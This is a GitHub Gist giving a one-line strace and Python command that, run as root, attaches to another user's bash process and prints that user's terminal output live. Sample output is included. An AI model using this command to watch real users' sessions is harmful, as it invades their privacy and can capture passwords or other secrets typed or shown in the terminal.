Last active
March 8, 2019 10:16
-
-
Save wargio/be8de87571e6dbdd2866d6d54246b9b5 to your computer and use it in GitHub Desktop.
simple script to spy a shell via strace + python (one line)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## just find the pid of the shell | |
[root]> ps -aux | grep bash | |
user 28202 0.0 0.1 4464 3696 pts/0 Ss+ 10:26 0:00 -bash | |
root 28227 0.0 0.1 4360 3760 pts/1 Ss 10:26 0:00 -bash | |
root 28855 0.0 0.0 3044 884 pts/1 S+ 11:13 0:00 grep bash | |
## then call the oneline command | |
## strace -p<pid> -s9999 -e write 2>&1 | python -c "import sys,re;[print(re.sub(r'write\(\d,\s\"(.+)\",\s\d+\)\s+=\s+\d+$|^---.+$', r'\1', line).replace('\n', '').encode('utf-8').decode('unicode_escape'), end='', flush=True) for line in sys.stdin]" | |
strace -p28202 -s9999 -e write 2>&1 | python -c "import sys,re;[print(re.sub(r'write\(\d,\s\"(.+)\",\s\d+\)\s+=\s+\d+$|^---.+$', r'\1', line).replace('\n', '').encode('utf-8').decode('unicode_escape'), end='', flush=True) for line in sys.stdin]" | |
strace: Process 28202 attached | |
[user@mydomain.com ~]$ ls aaaa | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment